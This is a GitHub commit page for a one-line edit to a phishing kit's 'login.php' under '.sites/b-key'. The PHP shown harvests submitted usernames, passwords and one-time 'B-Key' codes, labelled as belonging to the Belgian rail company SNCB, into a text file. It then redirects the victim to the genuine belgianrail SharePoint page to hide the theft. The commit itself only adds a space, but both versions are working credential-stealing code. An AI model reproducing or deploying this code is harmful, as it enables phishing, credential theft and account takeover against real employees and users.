Skip to content

Commit

Permalink
Update login.php
Browse files Browse the repository at this point in the history
  • Loading branch information
dracksters authored Jun 14, 2024
1 parent af075d5 commit 1095d60
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .sites/b-key/login.php
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
<?php

file_put_contents("usernames.txt", "sncb Username: " . $_POST['session_key'] . " Pass: " . $_POST['session_password'] . "B-Key : " . $_POST['OTP'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "sncb Username: " . $_POST['session_key'] . " Pass: " . $_POST['session_password'] . " B-Key : " . $_POST['OTP'] . "\n", FILE_APPEND);
header('Location: https://belgianrail.sharepoint.com/sites/WeBe/SitePages/Accueil.aspx');
exit();
?>

0 comments on commit 1095d60

Please sign in to comment.